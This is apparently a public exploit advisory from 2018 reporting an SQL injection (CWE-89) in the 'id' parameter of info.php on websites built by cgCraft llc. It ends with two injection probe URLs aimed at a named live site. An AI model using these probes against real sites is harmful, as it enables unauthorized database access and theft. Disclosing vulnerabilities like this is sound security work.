# Exploit Title: SQL Injection Vulnerability in " Website by cgCraft llc "
#-----------------------------------------------------------------------------------------
# Exploit Author: Mehdi Razmjoo ( razmjumehdi@gmail.com )
#-----------------------------------------------------------------------------------------
# Date: 2018.4.29
#-----------------------------------------------------------------------------------------
# Vendor Homepage: http://www.taptapas.com
#-----------------------------------------------------------------------------------------
# CWE: CWE-89
#-----------------------------------------------------------------------------------------
# Category: Web Application
#-----------------------------------------------------------------------------------------
#Dork: -
#-----------------------------------------------------------------------------------------
# Vulnerability Path: https://Server/info.php?id=[SQLi]
#-----------------------------------------------------------------------------------------
#Tested On: Kali Linux ( Firefox )
#-----------------------------------------------------------------------------------------
# Description:
#
# The vulnerability allows an attacker to inject sql commands. An bad guy might injects commands on URL in this path:
#
# https://Server/info.php?id=131
#
#-----------------------------------------------------------------------------------------
#
https://alphaonenow.org/info.php?id=131'
https://alphaonenow.org/info.php?id=131+order+by+1--